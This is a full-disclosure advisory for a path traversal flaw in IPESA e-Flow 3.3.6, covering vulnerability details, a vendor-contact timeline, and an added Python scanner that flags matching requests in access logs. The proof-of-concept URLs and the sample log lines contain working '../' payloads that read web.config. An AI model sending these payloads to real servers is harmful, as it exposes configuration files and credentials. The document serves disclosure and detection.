CVE-2021-42052: CVE-2021-42052 full disclosure - NXNJZ

IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res path and the R query parameter.

Vulnerability Details

IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res R parameter.


[Vulnerability Type] Directory Traversal


[Vendor of Product] IPESA


[Affected Product Code Base] e-Flow - v.3.3.6


[Affected Component] /lib/js/build/STEResource.res


[Attack Type] Remote


[Impact Information Disclosure] true


[Attack Vectors] Basic path traversal sequence in the ‘R’ query parameter


[Discoverer] nxnjz


[Reference] https://ipesa.com/seccion/gestiondecolaseflow.html

Proof of Concept

https://example.tld/STE/lib/js/build/STEResource.res?R=../../../../../web.config

https://example.tld/lib/js/build/STEResource.res?R=../../../../../web.config
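A log check for the request pattern above, added here as an example and not part of the original advisory: it flags access-log lines that request the affected component with a `..` segment in `R`, including percent-encoded and backslash forms. The combined log format, the case-insensitive matching of path and parameter name, and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

COMPONENT = "/lib/js/build/steresource.res"  # affected component, lower-cased
# Assumption: combined/common log format with a quoted request line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e is still seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_request(target):
    """True if target hits the affected component with '..' in the R parameter."""
    parts = urlsplit(target)
    # Assumption: the server treats path and parameter name case-insensitively.
    if not fully_decode(parts.path).lower().endswith(COMPONENT):
        return False
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.upper() != "R":
            continue
        # Split on both separators; a bare '..' segment is the traversal marker.
        if ".." in re.split(r"[\\/]", fully_decode(value)):
            return True
    return False

def scan(lines):
    """Return the log lines whose request matches the traversal pattern."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and is_traversal_request(m.group(1)):
            hits.append(line)
    return hits

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.5 - - [01/Jun/2021:10:00:00 +0000] "GET /STE/lib/js/build/STEResource.res?R=../../../../../web.config HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jun/2021:10:00:02 +0000] "GET /lib/js/build/STEResource.res?R=%252e%252e%255c%252e%252e%255cweb.config HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2021:10:01:00 +0000] "GET /lib/js/build/STEResource.res?R=strings.es HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jun/2021:10:01:05 +0000] "GET /index.aspx?R=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged line means the file was likely served; review what the requested path resolves to on that host.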

Timeline

  • May 31, 2021: Vulnerability discovered and reported to a bug bounty program.
  • August 4, 2021: Bug bounty program resolved the issue on their affected site.
  • October 6, 2021: Contacted e-Flow vendor via website form, no response.
  • October 7, 2021: CVE-2021-42052 reserved.
  • October 26, 2021: Contacted the vendor via their Whois registrant email address, no response.
  • October 26-29, 2021: Contacted the vendor via their WhatsApp customer service. They forwarded the issue.
  • November 11, 2021: Received a request for vulnerability details from the vendor.
  • November 11, 2021: Sent the requested info, and asked for an estimated time to resolution, no response.
  • February 21, 2022: Asked the vendor for an update, no response.
  • August 8, 2022: Publishing full disclosure.
